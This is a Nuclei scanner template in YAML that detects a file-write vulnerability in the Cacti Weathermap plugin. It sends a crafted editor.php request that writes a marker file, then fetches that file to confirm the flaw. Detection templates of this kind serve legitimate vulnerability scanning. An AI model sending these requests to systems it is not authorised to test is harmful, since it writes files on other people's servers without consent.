nuclei-templates/http/vulnerabilities/other/cacti-weathermap-file-write...

31 lines
1.3 KiB
YAML
Raw Normal View History

id: cacti-weathermap-file-write
info:
name: Cacti Weathermap File Write
author: pikpikcu
severity: medium
2024-01-02 15:45:12 +00:00
description: Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
tags: injection,cacti
http:
- method: GET
path:
- "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7"
2023-10-14 11:27:55 +00:00
- method: GET
path:
- "{{BaseURL}}/plugins/weathermap/configs/poc.conf"
matchers-condition: and
matchers:
- type: word
words:
- "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8"
part: body
2023-10-14 11:27:55 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100e007bc546210a550061742fec465f5462c91d52c6e1bd59d4310a1fa9e5dbb3502202a97985ab447760c5a4ffb20ae2de531e0f9576a0c38c6b65fcc6ffbdde931f8:922c64590222798bb761d5b6d8e72950